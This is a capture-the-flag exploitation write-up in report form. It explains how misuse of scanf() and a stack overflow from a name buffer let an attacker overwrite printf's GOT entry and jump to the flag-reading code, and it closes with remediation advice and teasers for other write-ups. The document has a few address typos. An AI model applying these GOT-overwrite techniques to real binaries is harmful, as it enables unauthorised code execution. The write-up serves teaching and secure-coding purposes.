This report can be read both on this site, and as its original report form. It is highly recommended that you read the original report form instead because it is better formatted.
Insecure code in the passcode.c file resulted in user-control of memory that is meant to be inaccessible. The lack of boundary checks in the login() function coupled with the improper usage of the libc scanf() function, consequently lead to the execution of the /bin/cat system command upon passing a carefully constructed malicious string. Specifically, the second parameter of scanf() was not an integer pointer value as it was not prepended with an ampersand. Taking advantage of insecure code and the fact that the binary in question is dynamically linked, an attacker is capable of overwriting the GOT entry of printf() or fflush() to jump to any place in the binary’s memory.
Attack Narrative
The source code and compiled binary of the program were provided. Furthermore, the SSH credentials of the owner of this binary were given:
Username
Password
Passcode
guest
Binary Behavior
Source Code
Before executing the binary, the program’s behavior will first be analyzed:
There are three user-created functions in total: main(), welcome(), and login(). The main() function, however, is not of interest as it only calls printf() and the welcome() and login() functions. Looking at welcome(), a buffer name[100] is initialized with 100 bytes. Afterwards, the scanf() function is called with %100s as the first argument; up to 100 bytes of data are passed into the aforementioned buffer and subsequently printed out when passed into printf() (this behavior is examined in the Taking Advantage of name[100] section). After welcome() is called, the login() function is executed.
Two variables are initialized: int passcode1 and int passcode2. Following the initialization of these variables, scanf(“%d”, passcode1) is called, but the second argument is not an integer pointer (as it is not prepended with the ampersand symbol). Next, fflush(stdin) is called as opposed to fflush(stdout). Incidentally, usage of the former is not recommended as it can invoke strange behavior due to it being undefined. The call to fflush() is meant for output streams only in which the buffered data is outputted to the console[1]. The scanf() function is then called again in which the second argument is not prepended with the ampersand symbol. Lastly, an if statement is run which is true when passcode1 is equal to 338150 and passcode2 is equal to 13371337. On the condition that this is true, the flag located on the target system is read out.
Executing Binary
Executing the binary with the input of 338150 for passcode1 and 13371337 for passcode2 results in a segmentation fault:
This behavior can be further examined using GDB, a GNU project debugger useful for dynamic analysis[2].
GDB
Examining Segmentation Fault
Running this binary in GDB, it can be seen that the program experiences a segmentation fault upon calling scanf() when moving EAX to EDX.
Therefore, the input passed into the second parameter of the scanf() function has the ability to overwrite memory.
Taking Advantage of name[100]
Recall that welcome() only allocated 100 bytes to user input and implemented the scanf() function with the %s format specifier. The insecurity relating to this utilization of scanf() lies within the fact that it does not perform boundary checks on the user input. This unsafe practice results in a security hole in which user input can overflow the area in memory allocated for this buffer if the developer does not provide a safe value for the field width specifier. In the case of this binary, providing an input of larger than 100 bytes can result in the overflow of otherwise inaccessible memory located within login(). This is because the field width specifier is 100 (%100s) and 100 bytes were allocated to the name buffer. Therefore, the trailing null byte will spill into memory located right after the buffer. To demonstrate this concept, observe the following:
First, the login() function is disassembled to find when the initial if statement occurs.
Note the line highlighted in red which signifies the beginning of the if statement. The hex value 0x528e6 (338150 in decimal) is compared to ebp-0x10, thus at this point in memory lies passcode1. By the same token, the line highlighted in purple represents passcode2 in which 0xcc07c9 (13371337 in decimal) is compared to ebp-0xc.
After setting a breakpoint at login+97 (0x080485c5), the program is run with a username of 101 A’s.
Now looking at the value located at ebp-0x10 shows something of interest:
41 in hex is ‘A’. Therefore, upon passing a large input to the name[100] buffer, the value for passcode1 can be written into. Additionally, observe the value for passcode2 located at ebp-0xc:
The null byte, a byte which is automatically appended to the end of a string to signify its end, leaks into passcode2 as can be seen from the trailing 0’s. Moreover, note how although 101 A’s were passed, the last trailing A did not flood into the value for passcode2 because of the field width specification (namely %100s) in the scanf(“%100s”, passcode1) call.
Exploit Construction
Where to Jump
Due to the unstable nature of this binary, passing in 338150 as passcode1 and 13371337 as passcode2 does not result in the expected execution of /bin/cat, rather a segmentation fault occurs (see Examining Segmentation Fault). Therefore, in order to execute /bin/cat, it is essential that the program is manipulated to point to an address after the if statement and before the call to the system command. Looking at the disassembly of the login() function, this leaves the following addresses: 0x080485d7, 0x080485de, and 0x080485e3. For the purposes of this report, the 0x080485d7 address is used which is 134514135 in decimal.
Which Function to Overwrite
With the established notion that one of the aforementioned values is necessary for the desired jump to the system call, the next question is “Which memory address should be overwritten with the desired value?”. Ideally, the memory of a used function can be overwritten so as to point to one of the desired values.
Using the readelf -a passcode command, the file header, sections, and symbols (along with a lot of other information) can be seen. This facilitates the process of finding where functions are mapped onto memory.
There are nine functions in total that readelf found. However, looking at the Source Code, only two functions are used before the system call and after scanf(): printf() and fflush(). Either function will work for this exploit, however in this report the printf() function is utilized. Due to this binary being in little-endian format, printf() in bytes is x00xa0x04x08.
The binary exploited in this report was unstripped and dynamically linked:
The fact that it was dynamically linked played an essential role in making the exploit succeed. To understand exactly how it worked, it is important to realize what dynamic linking is and how it operates.
Understanding Dynamic Linking
When a binary is dynamically linked, the libc calls within the program do not point to any meaningful addresses. Take the following snippet from passcode for example:
Note the text highlighted in red. The program calls fflush() and printf() which are at 0x8048430 and 0x8048420 respectively. Since this binary is dynamically linked, before the binary is ever run, fflush() and printf() (and any other libc function for that matter) refer to placeholder addresses such as 0x00000000. However, once the program is loaded, these addresses are resolved using the help of the Global Offset Table (GOT) and Procedure Linkage Table (PLT), a table which converts position-independent function calls to absolute locations[3]. When a libc function is called, the first thing the PLT does is jump to the GOT (Global Offset Table) entry of the called function. The GOT maps symbols (such as printf()) to their actual location[4]. Thus, when the exploit was passed into the binary, the GOT entry which maps printf() to its actual location was overwritten to instead point to 0x080485d7.
Examining the GOT Overwrite in GDB
The way the binary handles the malicious input can be examined more in detail within GDB. After disassembling the login() function, it can be seen that the printf() call that occurs after scanf() is at login+60 (or 0x080485a0):
After setting a breakpoint at this function and passing in the exploit, the breakpoint gets hit:
It was established that this exploit works. Therefore, somewhere within memory the address 0x80485d7 is loaded up. To find its exact location, the info proc mappings and find command within GDB can be utilized:
Recall that 134514135 is 0x080485d7 in hex and it points to the location between the if statement and system call.
Note that the find command has the syntax find _start_address, _end_address, _what_to_look_for
The pointer for printf() was successfully overwritten to 0x08045d7. Observe that this is different from the printf pointer before the exploit:
When stepping one instruction, it is expected that from the printf() call, the program will look at the GOT entry of printf(). The program will then be tricked to believe that the code for printf() can be found at 0x08045d7, and the EIP will therefore point to 0x08045d7:
Observe the instruction pointer (EIP) which jumped to the location between the if statement and system call.
Conclusion
The binary was successfully exploited which resulted in the leakage of otherwise inaccessible data. Compiler warnings should never be ignored. Unsafe practices involving user-input can lead to security holes. The scanf() function was improperly used, and is not recommended when dealing with strings (unless the developer is careful of the field width specifier and allocated buffer size). Furthermore, the second argument of scanf() was not prepended with the ampersand symbol, which allowed for the passing of an address causing the overwrite of printf(). The following remediations should be strongly considered:
Prepend scanf() with the amerpand symbol (&)
Failure to do so allowed for the direct passing of an address
When dealing with strings, allocate at most a field width that is one less than the buffer
Due to name[100] having 100 bytes, the scanf() field width specifier should be 99 instead of 100 to take into account the null byte
Use sscanf() in conjunction with getline() when dealing with user-inputted strings
getline() automatically allocates an appropriate buffer size to safely fit the input string[5]
The buffer of getline() can then be parsed with sscanf()
The aforementioned remediations should be followed as soon as possible to prevent the attack described in this report. It is essential that the developer follow safe programming practices especially when dealing with user-input.
This challenge was about exploiting a binary via a return-to-libc attack (due to the enabled NX bit). The address of printf was provided to faciliate exploitation, however it was only given after passing in user input. This address could not be used for future execution of the binary due to the presence of ASLR. Nevertheless, despite the presence of the enabled NX bit and ASLR, the binary was vulnerable.
This box is a great introduction to the exploitation of a web server. It involves exploiting a web service through an LFI vulnerability and upgrading that to an RCE exploit via log poisoning. The method of escalating to root privileges is also instructive.
This challenge was about binary exploitation. There were a total of nine binaries which increased in difficulty after each exploit. Common binary exploitation techniques are discussed in this report including ret2libc, shellcode injection, format string exploitation, among others.